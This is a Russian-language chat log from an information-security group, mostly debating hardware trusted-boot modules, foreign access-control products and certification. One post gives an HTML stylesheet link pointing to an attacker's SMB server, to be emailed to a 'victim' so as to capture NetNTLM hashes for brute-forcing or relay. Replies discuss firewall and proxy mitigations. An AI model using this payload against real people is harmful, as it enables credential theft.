S
К слову, ряд специалистов считает, что запад отстал от России в части технологий по защите информации
Ну да, и все воруют схемы АМДЗ, но воспрозвести не могу, отстали бедные. Да?
Size: a a a
2019 July 19
РМ
Ну да, и все воруют схемы АМДЗ, но воспрозвести не могу, отстали бедные. Да?
А как надо то, расскажите уже?
Ш
а причём тут яндекс и гугл?
При том что их браузеры ломятся на самбу
V
При том что их браузеры ломятся на самбу
а что в этом плохого? этой "проблеме" много лет, и решается она файрволами или иными средствами, блокирующими отправку ntlm сессии на неавторизованные хосты
Ш
а что в этом плохого? этой "проблеме" много лет, и решается она файрволами или иными средствами, блокирующими отправку ntlm сессии на неавторизованные хосты
Ну вот люди переживают за тех у кого нет МЭ, и не хотят чтобы браузер без спроса отсылал ваш хеш на непонятный smb
Ш
Спросить то можно?
V
может где в настройках хромиума это и отключается, через flags, но имхо переживать и не использовать МЭ, даже встроенный в винду это как хотеть выиграть лотерею и не покупать билет
S
А как надо то, расскажите уже?
Делаем поиск, например, по measured boot / trusted boot / secure boot, и, наверное, лучше в гугле, т.к. рускоязычных статей мало.
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
Ш
РусбиТех наверно потому что любит и ценить АМДЗ и видит рынок сбыта, свернули разработку Максима
I
Вопрос - в мире достаточно много производителей самых разных СЗИ, но кроме России, АМДЗ нигде не выпускают. Вот интересно, почему?
А примеры СЗИ от НСД иностранных производителей ? )
@
Доброго дня, сегодня поделюсь (вдруг кто не знает), способом заполучить netntlm сессию пользователя. По ней можно сбрутфорсить пароль, а можно и перенаправить её на какой нибудь ресурс с авторизацией через ntlm. Все очень банально просто. Нужно создать html файл с содержимым: <link rel="stylesheet" href="//адрес вашего smb сервера"> . Полученный файл отправляем "жертве" по эл. почте. Если у жертвы браузер на chromium либо ie + нет межсетевого экрана (соединения по смб в интернет не запрещены), то вы получите netntlm сессию. Бага была отправлена в google, там сказали что знают о ней 100 тысяч репортов назад. Бага была отправленя в яндекс (ибо яндекс браузер ведёт себя точно так же), яндекс решил не отвечать на письмо. Такие вот дела, малварь не нужна чтобы заполучить пароль пользователя.
Есть мнение , что хостам внутренней сети предприятия вообще не нужно без крайней необходимости предоставлять прямой доступ в интернет , только через прокси. В таком случае эксплуатация подобных сценариев будет затруднительна.
Ш
Есть мнение , что хостам внутренней сети предприятия вообще не нужно без крайней необходимости предоставлять прямой доступ в интернет , только через прокси. В таком случае эксплуатация подобных сценариев будет затруднительна.
Понятное дело что для каждой уязвимости можно применить меры компенсирующие ее
РМ
Делаем поиск, например, по measured boot / trusted boot / secure boot, и, наверное, лучше в гугле, т.к. рускоязычных статей мало.
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
Надеюсь, вы не отвечаете за безопасность
РМ
Иначе бы понимали, почему в ряде случаев требование к амдз быть аппаратным
РМ
РусбиТех наверно потому что любит и ценить АМДЗ и видит рынок сбыта, свернули разработку Максима
Там другие причины, не связанные с рынком
PK
А примеры СЗИ от НСД иностранных производителей ? )
Boldon james, titus, stormshield data enterprise
PK
Все эти решения содержат главную часть сзи от нсд - реализацию мандатного разграничения доступа
РМ
Все эти решения содержат главную часть сзи от нсд - реализацию мандатного разграничения доступа
🤗
VM
Надеюсь, вы не отвечаете за безопасность
Надеюсь, не ответчает за безопасность, связанной с большими рисками РФ. Если работает в представительстве западной компании - то прав на 100% в отношении своей сферы ответственности
S
А примеры СЗИ от НСД иностранных производителей ? )
А, например, сертифицированные ФСТЭКом средства от НСД , по каким РД сертифицируются?